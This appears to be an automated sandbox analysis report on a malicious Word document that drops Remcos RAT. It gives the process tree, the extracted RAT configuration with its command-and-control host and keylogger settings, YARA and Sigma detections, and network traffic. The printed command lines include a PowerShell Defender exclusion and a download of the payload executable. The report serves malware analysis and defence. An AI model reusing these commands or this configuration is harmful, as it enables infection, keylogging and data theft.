Edit tour

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID:	611840
MD5:	090e1dfdcbf2185788ea14cd113cc39f
SHA1:	6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:	3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags:	docRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Multi AV Scanner detection for domain / URL

Document contains OLE streams with names of living off the land binaries

Machine Learning detection for sample

Powershell drops PE file

Document contains OLE streams with PE executables

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Suspicious MsiExec Embedding Parent

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Sigma detected: Cabinet File Expansion

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Sigma detected: Msiexec Initiated Connection

Checks for available system drives (often done to infect USB drives)

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Internet Provider seen in connection with other malware

Document contains an embedded VBA macro which executes code when the document is opened / closed

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Uses cacls to modify the permissions of files

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7068 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

msiexec.exe (PID: 3568 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

icacls.exe (PID: 3316 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

expand.exe (PID: 6308 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)

conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

TRY.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)

cmd.exe (PID: 6672 cmdline: cmd /c thai.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6700 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 6884 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)

icacls.exe (PID: 5196 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6744 cmdline: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5188 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.4.1 Pro", "Host:Port:Password": "bambam.hopto.org:2311:1", "Assigned name": "TRY ", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-6NUKCJ", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
12543_0008858249_FWDOUTSTANDING_20200604.doc	SUSP_Doc_WindowsInstaller_Call_Feb22_1	Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.	Nils Kuhnert	0xe039:$: WindowsInstaller.Installer$ 0xec0b:$: CreateObject 0xec36:$: InstallProduct
12543_0008858249_FWDOUTSTANDING_20200604.doc	Office_AutoOpen_Macro	Detects an Microsoft Office file that contains the AutoOpen Macro function	Florian Roth	0xe1f3:$s1: AutoOpen 0xebee:$s1: AutoOpen 0xd500:$s2: Macros

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	SUSP_Doc_WindowsInstaller_Call_Feb22_1	Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.	Nils Kuhnert	0x239f:$: WindowsInstaller.Installer$ 0x22c0:$: CreateObject 0x4000:$: CreateObject 0x417c:$: CreateObject 0x41ba:$: CreateObject 0x4c19:$: CreateObject 0x41f0:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	SUSP_VBA_FileSystem_Access	Detects suspicious VBA that writes to disk and is activated on document open	Florian Roth	0x3ae4:$s1: \Common Files\Microsoft Shared\ 0x200b:$s2: Scripting.FileSystemObject 0x236a:$a3: AutoOpen 0x3fd2:$a3: AutoOpen 0x41cc:$a3: AutoOpen 0x4c34:$a3: AutoOpen
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x600e0:$s1: \Classes\mscfile\shell\open\command 0x60140:$s1: \Classes\mscfile\shell\open\command 0x60128:$s2: eventvwr.exe
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	REMCOS_RAT_variants	unknown	unknown	0x61064:$str_a1: C:\Windows\System32\cmd.exe 0x60fe0:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60fe0:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x605d8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60c30:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x601d4:$str_b2: Executing file: 0x611a8:$str_b3: GetDirectListeningPort 0x609f0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60c18:$str_b7: \update.vbs 0x601fc:$str_b9: Downloaded file: 0x601e8:$str_b10: Downloading file: 0x6028c:$str_b12: Failed to upload file: 0x61170:$str_b13: StartForward 0x61190:$str_b14: StopForward 0x60bc0:$str_b15: fso.DeleteFile " 0x60b54:$str_b16: On Error Resume Next 0x60bf0:$str_b17: fso.DeleteFolder " 0x6027c:$str_b18: Uploaded file: 0x6023c:$str_b19: Unable to delete: 0x60b88:$str_b20: while fso.FileExists(" 0x60711:$str_c0: [Firefox StoredLogins not found]

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", CommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", ProcessId: 6744, ProcessName: cmd.exe

Source: Process started

Author: Bhabesh Raj: Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 6308, ProcessName: expand.exe

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49742

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 6884, ProcessName: powershell.exe

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, ProcessId: 5860, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 6700, ProcessName: powershell.exe

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH, ParentImage: C:\Windows\SysWOW64\icacls.exe, ParentProcessId: 3316, ParentProcessName: icacls.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3384, ProcessName: conhost.exe

Source: Process started

Author: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , ProcessId: 5860, ProcessName: TRY.exe

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132949457099821122.6700.DefaultAppDomain.powershell

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/$	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Avira: detection malicious, Label: HEUR/AGEN.1213068

Found malware configuration

Source: TRY.exe.17.dr

Malware Configuration Extractor: Remcos {"Version": "3.4.1 Pro", "Host:Port:Password": "bambam.hopto.org:2311:1", "Assigned name": "TRY ", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-6NUKCJ", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Multi AV Scanner detection for submitted file

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	Virustotal: Detection: 37%			Perma Link
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	ReversingLabs: Detection: 24%

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Multi AV Scanner detection for domain / URL

Source: filebin.net	Virustotal: Detection: 5%			Perma Link
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	Virustotal: Detection: 5%			Perma Link

Machine Learning detection for sample

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

Source: TRY.exe.17.dr

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49775 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 87.238.33.7:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.5:49744 version: TLS 1.2

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source:	Binary string: wextract.pdb source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: wextract.pdbGCTL source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSIFECD.tmp.3.dr, MSI1064.tmp.3.dr, MSI847A.tmp.3.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: global traffic

TCP traffic: 192.168.2.5:49742 -> 185.47.40.36:443

Source: global traffic

DNS query: name: filebin.net

Source: global traffic

TCP traffic: 192.168.2.5:49742 -> 185.47.40.36:443

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: bambam.hopto.org

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49775 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 87.238.33.7:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: situla.bitbit.netConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: REDPILL-LINPRORedpillLinproNO REDPILL-LINPRORedpillLinproNO

Source: Joe Sandbox View	IP Address: 87.238.33.8 87.238.33.8
Source: Joe Sandbox View	IP Address: 185.47.40.36 185.47.40.36

Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.office.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
